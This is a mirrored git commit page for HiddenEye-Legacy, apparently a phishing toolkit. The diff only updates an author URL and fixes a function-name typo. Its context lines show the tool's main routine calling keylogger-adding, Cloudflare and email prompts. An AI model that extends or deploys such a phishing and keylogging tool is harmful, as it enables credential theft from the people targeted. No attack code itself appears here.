mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Small fix
This commit is contained in:
parent
3265116822
commit
a9315b6768
|
@ -1,6 +1,6 @@
|
|||
#!/usr/bin/python3
|
||||
#
|
||||
# HiddenEye by https://github.com/DarkSecDevelopers
|
||||
# HiddenEye by https://dark-sec-official.com
|
||||
#
|
||||
|
||||
from Defs.Languages import *
|
||||
|
@ -39,7 +39,7 @@ if __name__ == "__main__":
|
|||
|
||||
keyloggerprompt()
|
||||
addingkeylogger()
|
||||
cloudfarePrompt()
|
||||
cloudflarePrompt()
|
||||
emailPrompt()
|
||||
inputCustom()
|
||||
port = selectPort()
|
||||
|
|
Loading…
Reference in New Issue
Block a user